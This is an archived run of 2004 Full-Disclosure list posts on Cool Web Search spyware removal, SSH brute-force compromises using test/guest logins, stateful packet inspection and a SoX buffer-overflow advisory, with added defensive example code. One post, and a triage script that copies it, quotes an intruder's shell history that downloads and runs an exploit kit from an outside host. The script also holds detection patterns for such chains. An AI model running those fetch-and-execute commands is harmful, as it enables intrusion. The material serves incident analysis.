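        print(f"line {line_no}: {func}() with non-literal format '{fmt}'")
```

The check is deliberately line-based and conservative: a format built by a function such as a translation lookup is reported too, which is the right default for a review pass, since the fix (`printf("%s", s)`) costs nothing when the report is a false positive.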


 
Re: [Full-Disclosure] Cool Web Search

From: Andrew Clover (and-bugtraqdoxdesk.com)
Date: Fri Jul 30 2004 - 06:44:11 CDT


Gregh <chowsozemail.com.au> wrote:

> It was used by me to list various entries in registry which, when lumped
> together like that, show off CWS quite easily. Once they are there, removing
> them and the progs started by some of them is easy.

This is not the case for all variants of CWS. The newer, sneakier
variants can rebuild themselves if they detect a program like HijackThis
removing their registry entries.

This is part of a strong trend in unsolicited commercial software,
copying survival techniques learned from virus authors. The use of
constantly-loaded multiple DLLs and/or processes and/or services that
all restart and repair each other if tampering is detected, is becoming
widespread (see also CommonName, ClearSearch, TVMedia etc.).

Where there are not short-cut workarounds this means removing the
software manually is simply impossible. Currently a trip into Safe Mode
can do the trick, by stopping any of the software running, but I'm sure
that'll be worked around too eventually. (Rootkit-like spyware?)

--
Andrew Clover
mailto:anddoxdesk.com
http://www.doxdesk.com/



 
Re: [Full-Disclosure] Automated SSH login attempts?

From: Jan Muenther (jan.muenthernruns.com)
Date: Fri Jul 30 2004 - 06:51:56 CDT


Now, if anybody could jump through the hoop and send me the thing or make it
publicly available... all these things are musings, 'it looks as if...' and 'it
seems like...' are not exactly results of an analysis.

Just tracing tcpdump's output is definitely insufficient.
If the tool just sends normal TCP packets, then why does it need root rights,
which you typically only require for raw sockets to build packets which can't
be constructed with SOCK_STREAM or SOCK_DGRAM?

I hope you don't run it on your production boxes in the normal userland - ever
considered the fact it might contain an ELF infector or something?
Now, if I wanted to deploy malware on a Linux box, I'd just come up with a
mysterious looking tool and let that infect the machines of people who just
run anything they can get a hold of. It's Linux, after all, right? No viruses,
right?

> >Do I take it that these things are just trying to log in using some
> >guessed password(s) ? Out of interest, do we have any idea what these
> >opportunistic passwords might be ?
>
> At least two of them are guest:guest and test:test. I'd guess that
> root:root and adminadmin are on the list too :-)

This thing needs to be disassembled, debugged and traced. All else is just
whistling in the dark. Meh.

Cheers, J.



 
Re: [Fwd: Re: [Full-Disclosure] Re: Automated SSH login attempts?]

From: Kenneth Ng (kenneth.d.nggmail.com)
Date: Fri Jul 30 2004 - 07:25:17 CDT


I get at least a couple of probes every day. Almost all are refused
because I have a very restrictive /etc/hosts.allow list.

On Fri, 30 Jul 2004 12:14:30 +0200, Stefan Janecek
<stefan.janecekjku.at> wrote:
> uuups - forgot to cc the list on this one. sorry.
> -----Forwarded Message-----
> From: Stefan Janecek <stefan.janecekjku.at>
> To: Valdis.Kletnieksvt.edu
> Subject: Re: [Full-Disclosure] Re: Automated SSH login attempts?
> Date: Fri, 30 Jul 2004 11:45:51 +0200
> On Thu, 2004-07-29 at 21:35, Valdis.Kletnieksvt.edu wrote:
> > On Thu, 29 Jul 2004 18:38:15 +0200, Stefan Janecek <stefan.janecekjku.at> said:
> > >
> > > This does not seem to be a stupid brute force attack, as there is only
> > > one login attempt per user. Could it be that the tool tries to exploit
> > > some vulnerability in the sshd, and just tries to look harmless by using
> > > 'test' and 'guest' as usernames?
> >
> > Highly doubtful. It's easy enough to test though - just use the tool
> > to poke another machine under your control, and use tcpdump or ethereal
> > to capture all the traffic (don't forget '-s 1500' or similar for tcpdump
> > to get the *whole* packet). Then somebody familiar with the SSH
> > protocol can go through it byte by byte and look for anything odd.
> >
> > I don't expect we'll find anything, unless it's some very hard to trigger hole
> > on some odd architecture. Remember - with all of these probes, we're only
> > seeing a very few boxes actually get 0wned. More likely, script kiddies have
> > re-discovered the concept that if there's 500 million boxes online, enough of
> > them are administered by clueless people that they can snarf shells using a
> > default userid/password pair.....
> >
>
>
> This is exactly what I did. The tool tries to login as users 'test' and
> 'guest'. But I don't think it is about just snarfing passwords, because
> those users did not exist on the compromised machine - yet they got in.
>
> My personal feeling is (given their poor success) that they are using
> some old-fart ssh vulnerability. The compromised machine had an uptime
> of 254 days if I remember correctly, and was hardly used during this
> time, nor has it been updated. Still I would really like to know
> *exactly* what they are doing, just to make sure...
>
>
>
>
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.netsys.com/full-disclosure-charter.html
>



 
RE: [Full-Disclosure] CHX-I

From: Clement Dupuis (cdupuiscccure.org)
Date: Fri Jul 30 2004 - 07:23:30 CDT


Being from Montreal where CHX-I is developed, I had the chance to use it for
a while on a few servers and workstations, so far I have been impressed by
the product. I do know that it is being used by some government
organization in the states as well as quite a few universities. There are
some large commercial companies in Canada that are using it and some others
who are evaluating it.

The product is just amazing in its functionality and simplicity. It's like
getting lots of the niceties only found in Linux on your Windows platform
all of a sudden.

The company behind the product has been in existence for a while; they
definitively need to market their product more aggressively as it is
relatively unknown to most.

Clement

> -----Original Message-----
> From: full-disclosure-adminlists.netsys.com [mailto:full-disclosure-
> adminlists.netsys.com] On Behalf Of Maurizio Trinco
> Sent: Thursday, July 29, 2004 10:47 PM
> To: full-disclosurelists.netsys.com
> Subject: [Full-Disclosure] CHX-I
>
> Hey all,
> CHX (http://www.idrci.net/idrci_tryit2.htm) seems to
> be a very nice piece of software. Anyone tried it in
> real life? After toying with it for a couple of hours,
> I really don't understand how come it's still just a
> (relatively) obscure application. Any comments re. its
> usage? any known vulnerabilities?
>
>
>
>
> __________________________________
> Do you Yahoo!?
> New and Improved Yahoo! Mail - 100MB free storage!
> http://promotions.yahoo.com/new_mail
>
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.netsys.com/full-disclosure-charter.html



 
RE: [Full-Disclosure] Automated SSH login attempts?

From: Todd Towles (toddtowlesbrookshires.com)
Date: Fri Jul 30 2004 - 07:53:18 CDT


Jan is right - looking at the code might be the only way to know what is
really happening.

We all await your disassembled, debugged and traced code analysis, Jan. =)

-----Original Message-----
From: full-disclosure-adminlists.netsys.com
[mailto:full-disclosure-adminlists.netsys.com] On Behalf Of Jan Muenther
Sent: Friday, July 30, 2004 6:52 AM
To: Andrew Farmer
Cc: Ali Campbell; full-disclosurelists.netsys.com
Subject: Re: [Full-Disclosure] Automated SSH login attempts?

Now, if anybody could jump through the hoop and send me the thing or make it
publicly available... all these things are musings, 'it looks as if...' and
'it seems like...' are not exactly results of an analysis.

Just tracing tcpdump's output is definitely insufficient.
If the tool just sends normal TCP packets, then why does it need root rights,
which you typically only require for raw sockets to build packets which can't
be constructed with SOCK_STREAM or SOCK_DGRAM?

I hope you don't run it on your production boxes in the normal userland - ever
considered the fact it might contain an ELF infector or something?
Now, if I wanted to deploy malware on a Linux box, I'd just come up with a
mysterious looking tool and let that infect the machines of people who just
run anything they can get a hold of. It's Linux, after all, right? No viruses,
right?

> >Do I take it that these things are just trying to log in using some
> >guessed password(s) ? Out of interest, do we have any idea what these
> >opportunistic passwords might be ?
>
> At least two of them are guest:guest and test:test. I'd guess that
> root:root and adminadmin are on the list too :-)

This thing needs to be disassembled, debugged and traced. All else is just
whistling in the dark. Meh.

Cheers, J.



 
Re: [Full-Disclosure] Cool Web Search

From: Dave Horsfall (davehorsfall.org)
Date: Fri Jul 30 2004 - 08:26:59 CDT


On Fri, 30 Jul 2004, Andrew Clover wrote:

> This is not the case for all variants of CWS. The newer, sneakier
> variants can rebuild themselves if they detect a program like HijackThis
> removing their registry entries.

Not really "new", in the scheme of things. Over 30 years ago, some bored
programmer wrote something for one of the mainframes of the day (ICL?
IBM? Burroughs?) called "Robin Hood and Friar Tuck".

They were two programs that monitored each other, occasionally printing
cheeky messages to the console. Eventually, the (night-shift) operator
would notice, and delete one of them. The console dialogue then went
something like this:

FRIAR: HELP ME SIR ROBIN, I AM UNDER ATTACK!
ROBIN: FEAR NOT, BRAVE FRIAR, I SHALL RESCUE YOU!

And so one restarted the other.

The only way to remove this harmless jape (if you didn't know the right
command) was to IPL the box, and it was a brave operator who did that...

-- Dave



 
Re: [Full-Disclosure] Re: Automated SSH login attempts?

From: andrewgfelinemenace.org
Date: Fri Jul 30 2004 - 08:36:02 CDT


Greetings list,

Accidentally sent only to Stefan, so redoing it.

On Thu, Jul 29, 2004 at 06:38:15PM +0200, Stefan Janecek wrote:
> Hmmm - I have also been getting those login attempts, but thought them to
> be harmless. Maybe they are not *that* harmless, though... Today I
> managed to get my hands on a machine that was originating such login
> attempts. I must admit I am far from being a linux security expert, but
> this is what I've found out up to now:
>

I got a similar experience from a game box I look after
(void.labs.pulltheplug.com, but people may prefer
http://vortex.labs.pulltheplug.com, feel free to jump on the irc server
irc.pulltheplug.com, #social or #vortex).

The .bash_history is as follows:

passwd
uname -a
cat /etc/issue
w
/sbin.ifconfig
/sbin/ifconfig
wget sh3ll.info/milenium/xpl.tgz;tar zxvf xpl.tgz;cd super;./prt
ftp ftp.sh3ll.info
lynx
lynx www.sh3ll.info/milenium/xpl.tgz
ls
ls -alF
tar zxv xpl.tgz
tar zxvf xpl.tgz
cd supe`
cd super
./prt
lynx mil3nium.go.ro/milenium
lynx mil3nium.go.ro/
ncftp
ncftpget
lynx sh3ll.info/milenium/milenium
ls
ls -alF
ps -aux |grep test
lynx sh3ll.info/milenium/psy1985.tgz
mkdir .drivers
mv psy1985.tgz .drivers
cd .drivers
tar zxvf psy1985.tgz
rm -rf psy1985.tgz
cd nsmail/
PATH='.:$PATH'
inetd -e -o

It would appear that if they can't get a local root, they'll use the box for
IRCing from.

Hopefully this helps someone. I haven't looked too much into this; if wanted
I could grab the source IP addresses used for logging into guest, but that's
probably not overly useful.

Thanks,
Andrew Griffiths

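A triage pass over a recovered .bash_history like the one above, added here as an example and not code from the poster. The history below is an abridged copy of the quoted one; the indicators are the behaviours it shows (archive fetched from a remote host, download-extract-execute chain, hidden directory, archive deleted after unpacking, `.` prepended to PATH, host reconnaissance, inetd started by hand) generalised into patterns so the same pass works on other histories.

```python
"""Score a recovered shell history for post-compromise tool-staging behaviour.

Added example for the post above; not code from the poster. The history is
abridged from the one quoted in the post.
"""
import re

HISTORY = """\
passwd
uname -a
cat /etc/issue
w
/sbin/ifconfig
wget sh3ll.info/milenium/xpl.tgz;tar zxvf xpl.tgz;cd super;./prt
ps -aux |grep test
mkdir .drivers
mv psy1985.tgz .drivers
cd .drivers
tar zxvf psy1985.tgz
rm -rf psy1985.tgz
PATH='.:$PATH'
inetd -e -o
"""

# (label, pattern) pairs; each is one behaviour seen in the quoted history.
INDICATORS = [
    ("archive fetched from remote host",
     re.compile(r"\b(wget|curl|lynx|ncftpget|ftp)\b.*\.(tgz|tar\.gz|tar|zip)\b")),
    ("download-extract-execute chain on one line",
     re.compile(r"\b(wget|curl|lynx)\b.*;.*\btar\b.*;.*\./\S+")),
    ("hidden directory created",
     re.compile(r"\bmkdir\s+(-p\s+)?\.[^./]\S*")),
    ("archive deleted after extraction",
     re.compile(r"\brm\s+(-\S+\s+)*\S+\.(tgz|tar\.gz)\b")),
    ("current directory prepended to PATH",
     re.compile(r"PATH=['\"]?\.:")),
    ("host/network reconnaissance",
     re.compile(r"^(uname|cat /etc/issue|w|/sbin/ifconfig|ifconfig)\b")),
    ("account password changed from the shell",
     re.compile(r"^passwd\b")),
    ("inetd started by hand",
     re.compile(r"\binetd\b")),
]


def find_indicators(history):
    """Return [(line_no, label, command)] for every command matching an indicator."""
    hits = []
    for n, cmd in enumerate(history.splitlines(), 1):
        for label, pattern in INDICATORS:
            if pattern.search(cmd):
                hits.append((n, label, cmd))
    return hits


def summarize(history):
    """Count hits per indicator label; an empty dict means nothing matched."""
    counts = {}
    for _, label, _ in find_indicators(history):
        counts[label] = counts.get(label, 0) + 1
    return counts


if __name__ == "__main__":
    for n, label, cmd in find_indicators(HISTORY):
        print(f"{n:3}: {label:45} {cmd}")
```

Individual recon commands are routine on their own; the value of the pass is the combination, so treat the summary (several distinct labels within a short history) as the signal rather than any single hit.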


 
[Full-Disclosure] Stateful Packet Inspection

From: Aaron Gray (angraybeeb.net)
Date: Fri Jul 30 2004 - 07:44:39 CDT


I am interested in finding information on SPI: either algorithms and/or open source code.

Hope you can help,

TCS



 
Re: [Full-Disclosure] Cool Web Search

From: Gregh (chowsozemail.com.au)
Date: Fri Jul 30 2004 - 08:36:49 CDT


----- Original Message -----
From: "Andrew Clover" <and-bugtraqdoxdesk.com>
To: <full-disclosurelists.netsys.com>
Sent: Friday, July 30, 2004 9:44 PM
Subject: Re: [Full-Disclosure] Cool Web Search

> Gregh <chowsozemail.com.au> wrote:
>
> > It was used by me to list various entries in registry which, when lumped
> > together like that, show off CWS quite easily. Once they are there,
removing
> > them and the progs started by some of them is easy.
>
> This is not the case for all variants of CWS. The newer, sneakier
> variants can rebuild themselves if they detect a program like HijackThis
> removing their registry entries.

Sorry but totally and utterly incorrect. You just do NOT understand what I
have typed. I said that I used HiJackThis to list the entries in a group
then ticked them manually and then removed them. Along with that, it allowed
you to identify the exe files that went with it.

If you don't understand that then I can understand that you don't know how to
get rid of it but the truth is that this way DOES get rid of it. There are
at LEAST 5 variants of CWS. I have met them all and beat them all.

>
> This is part of a strong trend in unsolicited commercial software,
> copying survival techniques learned from virus authors. The use of
> constantly-loaded multiple DLLs and/or processes and/or services that
> all restart and repair each other if tampering is detected, is becoming
> widespread (see also CommonName, ClearSearch, TVMedia etc.).

All easily beaten by using HiJackThis in the way I described. If I can do
it, anyone with just a small amount of registry knowledge also can.

>
> Where there are not short-cut workarounds this means removing the
> software manually is simply impossible. Currently a trip into Safe Mode

Absolute and utter rot! I understand YOU may not be able to do it but it CAN
be done. It is simple logic if you want to look at it another way - whatever
can be DONE can be UNdone. The way I described works perfectly every time and
takes 10 minutes or less to get rid of it though admittedly the first time
you use HiJackThis it can take longer.

> can do the trick, by stopping any of the software running, but I'm sure
> that'll be worked around too eventually. (Rootkit-like spyware?)
>

No, you are utterly wrong there, too. I have run Spybot and Adaware in safe
mode. Spybot sees and removes CWS but it comes back on next boot anyway. You
have to use HiJackThis to list the registry entries which stand out like a
sore thumb at that point. If you can't identify incorrect registry entries,
though, naturally it will elude you!

Greg.

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html


 
Re: [Full-Disclosure] Re: Automated SSH login attempts?

From: nicolas vigier (boklmmars-attacks.org)
Date: Fri Jul 30 2004 - 09:10:17 CDT


On Thu, 29 Jul 2004, Stefan Janecek wrote:

> The compromised machine was running an old debian woody installation
> which had not been upgraded for at least one year, the sshd version
> string says 'OpenSSH_3.6.1p2 Debian 1:3.6.1p2-10'

But that was not the default debian woody sshd ?
Woody has this one :
SSH-2.0-OpenSSH_3.4p1 Debian 1:3.4p1-1.woody.3

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html


 
Re: Re: [Full-Disclosure] Cool Web Search

From: Rmuge NineFive (rmug9500lycos.co.uk)
Date: Fri Jul 30 2004 - 08:47:15 CDT


Regarding removal of newer versions of Cool Web Search.

 See this web page.

http://www.pchell.com/support/onlythebest.shtml

I have encountered the problem described on the page and successfully removed the Hijack using Hijackthis
and AboutBuster.

Spybot and AdAware did not detect the BHO elements.

Film & TV Extras urgently required in your area - See Yourself in major Films & TV? Call 0907 1512440 to Register. calls cost 150pm

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html


 
Re: [Full-Disclosure] Re: OpenServer 5.0.6 OpenServer 5.0.7 : Multiple Vulnerabilities in Sendmail

From: George Capehart (capegeoopengroup.org)
Date: Fri Jul 30 2004 - 09:40:08 CDT


On Thursday 29 July 2004 22:57, Frank Knobbe allegedly wrote:

<snip>

>
> Heya George,
>
> perhaps the engineers are too busy fixing broken legal strategies and
> are putting silly software issues on the back-burner.
>
> (After all, why fix it if they file Chapter 11 by end of the year
> anyway?)

Hola Frank,

Naaaa. They won't need to do that . . . Microsoft needs them to carry
on the good fight against Open Source. They'll keep them afloat.
http://opensource.org/halloween/halloween10.html :)

Cheers,

/g

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html


 
AW: [Full-Disclosure] Stateful Packet Inspection

issuni.de
Date: Fri Jul 30 2004 - 09:36:01 CDT


Look into the iptables/netfilter docs, located here:
http://www.netfilter.org/documentation/index.html

Connection tracking is explained here
http://www.sns.ias.edu/~jns/security/iptables/iptables_conntrack.html

Regards

Marco Ellmann

> -----Original Message-----
> From: full-disclosure-adminlists.netsys.com
> [mailto:full-disclosure-adminlists.netsys.com] On Behalf Of Aaron Gray
> Sent: Friday, 30 July 2004 14:45
> To: full-disclosurelists.netsys.com
> Subject: [Full-Disclosure] Stateful Packet Inspection
>
> I am interested in finding information on SPI, either
> algorithms, and/or open source code,
>
> Hope you can help,
>
> TCS
>
>

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html
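Marco points at the netfilter connection-tracking documentation; as an added illustration of the algorithm those documents describe (example code written for this page, not netfilter's own, and much simplified), the Python below keeps a per-flow TCP state table and uses it to decide which packets pass. Only a fresh SYN from the inside may create an entry; everything else must match an existing flow in its current state. The Packet class, StatefulFilter, and the addresses in demo() are this example's own constructions.

```python
from dataclasses import dataclass


@dataclass(frozen=True)
class Packet:
    src: str
    sport: int
    dst: str
    dport: int
    flags: frozenset  # TCP flag names, e.g. frozenset({"SYN", "ACK"})


class StatefulFilter:
    """Toy stateful packet filter: tracks TCP flows opened from the inside
    and passes only packets that belong to a tracked flow."""

    def __init__(self, inside_prefix):
        self.inside_prefix = inside_prefix   # e.g. "10.0.0." marks the protected side
        self.conns = {}                      # originator 4-tuple -> state name

    def _inside(self, ip):
        return ip.startswith(self.inside_prefix)

    def decide(self, pkt):
        fwd = (pkt.src, pkt.sport, pkt.dst, pkt.dport)
        rev = (pkt.dst, pkt.dport, pkt.src, pkt.sport)
        flags = set(pkt.flags)

        if fwd in self.conns:
            key, state, direction = fwd, self.conns[fwd], "orig"
        elif rev in self.conns:
            key, state, direction = rev, self.conns[rev], "reply"
        else:
            # Untracked packet: a bare SYN from inside to outside opens a flow;
            # an inbound SYN or a bare ACK with no state (ACK scan) is dropped.
            if flags == {"SYN"} and self._inside(pkt.src) and not self._inside(pkt.dst):
                self.conns[fwd] = "SYN_SENT"
                return "ACCEPT"
            return "DROP"

        if "RST" in flags:
            del self.conns[key]          # abort: forget the flow immediately
            return "ACCEPT"
        if "FIN" in flags:
            self.conns[key] = "CLOSING"  # a real tracker expires this on a timer
            return "ACCEPT"

        if state == "SYN_SENT":
            if direction == "reply" and flags == {"SYN", "ACK"}:
                self.conns[key] = "SYN_RECV"
                return "ACCEPT"
            if direction == "orig" and flags == {"SYN"}:
                return "ACCEPT"          # retransmitted SYN
            return "DROP"
        if state == "SYN_RECV":
            if direction == "orig" and "ACK" in flags:
                self.conns[key] = "ESTABLISHED"
                return "ACCEPT"
            if direction == "reply" and flags == {"SYN", "ACK"}:
                return "ACCEPT"          # retransmitted SYN/ACK
            return "DROP"
        if state == "CLOSING":
            return "ACCEPT" if flags & {"ACK", "FIN"} else "DROP"
        return "ACCEPT"                  # ESTABLISHED: either direction on the tuple


def demo():
    """Constructed packet sequence (documentation-range addresses)."""
    fw = StatefulFilter("10.0.0.")
    inside, outside = "10.0.0.5", "203.0.113.9"
    seq = [
        ("inbound SYN (scan)",      Packet(outside, 40000, inside, 22, frozenset({"SYN"}))),
        ("inbound bare ACK (scan)", Packet(outside, 40001, inside, 22, frozenset({"ACK"}))),
        ("outbound SYN",            Packet(inside, 51000, outside, 80, frozenset({"SYN"}))),
        ("reply SYN/ACK",           Packet(outside, 80, inside, 51000, frozenset({"SYN", "ACK"}))),
        ("handshake ACK",           Packet(inside, 51000, outside, 80, frozenset({"ACK"}))),
        ("reply data",              Packet(outside, 80, inside, 51000, frozenset({"ACK", "PSH"}))),
        ("reply RST",               Packet(outside, 80, inside, 51000, frozenset({"RST"}))),
        ("late packet after RST",   Packet(outside, 80, inside, 51000, frozenset({"ACK"}))),
    ]
    return [(label, fw.decide(p)) for label, p in seq]


if __name__ == "__main__":
    for label, verdict in demo():
        print(f"{label:26} -> {verdict}")
```

The second packet is the point of the exercise: a stateless "established" rule that keys on the ACK bit alone would pass it, whereas the state table knows no flow exists and drops it. A production tracker additionally checks sequence numbers and windows, expires entries on timers, handles UDP and ICMP with pseudo-state, and copes with the many retransmission and simultaneous-close cases this toy ignores.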


 
RE: Re: [Full-Disclosure] Cool Web Search

From: Todd Towles (toddtowlesbrookshires.com)
Date: Fri Jul 30 2004 - 09:59:54 CDT


There is a free piece of software somewhere that will grab all the BHOs
(Browser Helper Objects) out of the registry and display them all. Anyone
remember where this software can be found?

-----Original Message-----
From: full-disclosure-adminlists.netsys.com
[mailto:full-disclosure-adminlists.netsys.com] On Behalf Of Rmuge NineFive
Sent: Friday, July 30, 2004 8:47 AM
To: Disclosure Full
Subject: Re: Re: [Full-Disclosure] Cool Web Search

Regarding removal of newer versions of Cool Web Search.

 See this web page.

http://www.pchell.com/support/onlythebest.shtml

I have encountered the problem described on the page and successfully
removed the Hijack using Hijackthis
and AboutBuster.

Spybot and AdAware did not detect the BHO elements.


_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html


 
RE: [Full-Disclosure] Automated SSH login attempts? Related Cross post from incidents.org

From: Harris, Michael C. (HarrisMChealth.missouri.edu)
Date: Fri Jul 30 2004 - 10:31:08 CDT


 

-----Original Message-----
From: intrusions-bounceslists.sans.org
[mailto:intrusions-bounceslists.sans.org] On Behalf Of Andrew Daviel
Sent: Thursday, July 29, 2004 4:01 PM
To: intrusionsincidents.org
Subject: [Intrusions] Linux SSH scanning - test/guest

FYI

We got zapped by some hackers from, I think, Romania that have a priv
escalation exploit for Linux 2.4.20
http://sirzion.illusivecreations.com/loginxy

There is also a multithreaded SSH bruteforcer called "haita"
This attempts to login to machines using the accounts "test" and
"guest", with passwords "test" & "guest" respectively.
It runs from a file of addresses found by a synscan program. It
identifies itself as SSH-2.0-libssh-0.1

So, SSH login failures for test & guest are an indication of this thing
running at the remote end.

The two names & passwords appear to be hardcoded into the program.
Since Linux as I recall backs off after failed attempts there wouldn't
be much to gain by trying many more names, but variants may appear with
other defaults.

--
Andrew Daviel, TRIUMF, Canada
Tel. +1 (604) 222-7376
securitytriumf.ca
_______________________________________________
Intrusions mailing list
Intrusionslists.sans.org
http://www.dshield.org/mailman/listinfo/intrusions
-----Original Message-----
From: full-disclosure-adminlists.netsys.com
[mailto:full-disclosure-adminlists.netsys.com] On Behalf Of Todd Towles
Sent: Friday, July 30, 2004 7:53 AM
To: 'Jan Muenther'
Cc: full-disclosurelists.netsys.com
Subject: RE: [Full-Disclosure] Automated SSH login attempts?

Jan is right - looking at the code might be the only way to know what is
really happening.

We all await your disassembled, debugged and traced code analysis, Jan.
=)

-----Original Message-----
From: full-disclosure-adminlists.netsys.com
[mailto:full-disclosure-adminlists.netsys.com] On Behalf Of Jan
Muenther
Sent: Friday, July 30, 2004 6:52 AM
To: Andrew Farmer
Cc: Ali Campbell; full-disclosurelists.netsys.com
Subject: Re: [Full-Disclosure] Automated SSH login attempts?

Now, if anybody could jump through the hoop and send me the thing or
make it publicly available... all these things are musings, 'it looks as
if...' and 'it seems like...' are not exactly results of an analysis.

Just tracing tcpdump's output is definitely insufficient.
If the tool just sends normal TCP packets, then why does it need root
rights, which you typically only require for raw sockets to build
packets which can't be constructed with SOCK_STREAM or SOCK_DGRAM?

I hope you don't run it on your production boxes in the normal userland
- ever considered the fact it might contain an ELF infector or
something?
Now, if I wanted to deploy malware on a Linux box, I'd just come up with
a mysterious looking tool and let that infect the machines of people who
just run anything they can get a hold of. It's Linux, after all, right?
No viruses, right?

> >Do I take it that these things are just trying to log in using some
> >guessed password(s) ? Out of interest, do we have any idea what these

> >opportunistic passwords might be ?
>
> At least two of them are guest:guest and test:test. I'd guess that
> root:root and adminadmin are on the list too :-)

This things needs to be disassembled, debugged and traced. All else is
just whistling in the dark. Meh.

Cheers, J.

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html



 
Re: [Full-Disclosure] Cool Web Search

From: Andrew Clover (and-bugtraqdoxdesk.com)
Date: Fri Jul 30 2004 - 10:13:43 CDT


Dave Horsfall <davehorsfall.org> wrote:

> Not really "new", in the scheme of things. Over 30 years ago, some bored
> programmer wrote something for one of the mainframes of the day (ICL?
> IBM? Burroughs?) called "Robin Hood and Friar Tuck".

Yeah, I was aware of this story; the Jargon File attributes it to Moto
staff working on Xerox CP-V. A few Win32 viruses copied the idea
(notably Gemini, see Virus Bulletin Sep02); this is what I meant by
parasite vendors stealing ideas from VXers.

The first parasite I saw using this trick was CommonName/Comwiz, but the
recent HuntBar/WinTools takes the biscuit by installing two processes,
one service and one BHO, all looking out for each other. Charming
behaviour for software purporting to be a search enhancer from a
'legitimate' company, eh?

I preferred viruses. You knew where you stood with viruses. They printed
a quote from a TV show and wiped your discs, you laughed at the funny
gag and reinstalled, everyone was happy. (Well, ish.)

Malware attaching its tentacles onto your machine to make a few dollars
from advertising and spam is just so much more offensively sleazy.

--
Andrew Clover
mailto:anddoxdesk.com
http://www.doxdesk.com/

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html


 
[Full-Disclosure] [ GLSA 200407-23 ] SoX: Multiple buffer overflows

From: Thierry Carrez (koongentoo.org)
Date: Fri Jul 30 2004 - 09:59:35 CDT


-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Gentoo Linux Security Advisory GLSA 200407-23
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
                                            http://security.gentoo.org/
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

  Severity: Normal
     Title: SoX: Multiple buffer overflows
      Date: July 30, 2004
      Bugs: #58733
        ID: 200407-23

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis
========

SoX contains two buffer overflow vulnerabilities in the WAV header
parser code.

Background
==========

SoX is a command line utility that can convert various formats of
computer audio files into other formats.

Affected packages
=================

    -------------------------------------------------------------------
     Package / Vulnerable / Unaffected
    -------------------------------------------------------------------
  1 media-sound/sox <= 12.17.4-r1 >= 12.17.4-r2

Description
===========

Ulf Harnhammar discovered two buffer overflows in the sox and play
commands when handling WAV files with specially crafted header fields.

Impact
======

By enticing a user to play or convert a specially crafted WAV file an
attacker could execute arbitrary code with the permissions of the user
running SoX.

Workaround
==========

There is no known workaround at this time. All users are encouraged to
upgrade to the latest available version of SoX.

Resolution
==========

All SoX users should upgrade to the latest version:

    # emerge sync

    # emerge -pv ">=media-sound/sox-12.17.4-r2"
    # emerge ">=media-sound/sox-12.17.4-r2"

References
==========

  [ 1 ] Full Disclosure Announcement

http://archives.neohapsis.com/archives/fulldisclosure/2004-07/1141.html

Availability
============

This GLSA and any updates to it are available for viewing at
the Gentoo Security Website:

    http://security.gentoo.org/glsa/glsa-200407-23.xml

Concerns?
=========

Security is a primary focus of Gentoo Linux and ensuring the
confidentiality and security of our users' machines is of utmost
importance to us. Any security concerns should be addressed to
securitygentoo.org or alternatively, you may file a bug at
http://bugs.gentoo.org.

License
=======

Copyright 2004 Gentoo Foundation, Inc; referenced text
belongs to its owner(s).

The contents of this document are licensed under the
Creative Commons - Attribution / Share Alike license.

http://creativecommons.org/licenses/by-sa/1.0

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.2.4 (GNU/Linux)
Comment: Using GnuPG with Thunderbird - http://enigmail.mozdev.org

iD8DBQFBCmJWvcL1obalX08RAijlAJ9C3qaGE3pW9JKve99S0qABwiTbuQCeKcn6
NdGB0d0mJHQx2OOZtYNdFEw=
=nuUa
-----END PGP SIGNATURE-----

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html


 
RE: Re: [Full-Disclosure] Cool Web Search

From: Dean Porter (deancenterpartners.com)
Date: Fri Jul 30 2004 - 11:35:09 CDT


HijackThis: http://www.merijn.org/files/hijackthis.zip
BHODemon 2.0: http://www.definitivesolutions.com/bhodemon.htm
BHPCop (CleanMyPC Registry Cleaner):
http://www.registry-cleaner.net/bho-manager.htm

Dean

-----Original Message-----
From: Todd Towles [mailto:toddtowlesbrookshires.com]
Sent: Friday, July 30, 2004 9:00 AM
To: 'Rmuge NineFive '; 'Disclosure Full'
Subject: RE: Re: [Full-Disclosure] Cool Web Search

There is a free piece of software somewhere that will grab all the BHOs
(Browser Helper Objects) out of the registry and display them all. Anyone
remember where this software can be found?

-----Original Message-----
From: full-disclosure-adminlists.netsys.com
[mailto:full-disclosure-adminlists.netsys.com] On Behalf Of Rmuge NineFive
Sent: Friday, July 30, 2004 8:47 AM
To: Disclosure Full
Subject: Re: Re: [Full-Disclosure] Cool Web Search

Regarding removal of newer versions of Cool Web Search.

 See this web page.

http://www.pchell.com/support/onlythebest.shtml

I have encountered the problem described on the page and successfully
removed the Hijack using Hijackthis
and AboutBuster.

Spybot and AdAware did not detect the BHO elements.


_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html



 
Re: [Full-Disclosure] Cool Web Search

Valdis.Kletnieksvt.edu
Date: Fri Jul 30 2004 - 11:27:39 CDT


On Fri, 30 Jul 2004 23:36:49 +1000, Gregh <chowsozemail.com.au> said:

> If you don't understand that then I can understand that you don't know how to
> get rid of it but the truth is that this way DOES get rid of it. There are
> at LEAST 5 variants of CWS. I have met them all and beat them all.

Beware... The fact that you have beaten all the ones you have met does not
imply either that you have beaten them all, or even that you have met them all.

-----BEGIN PGP SIGNATURE-----
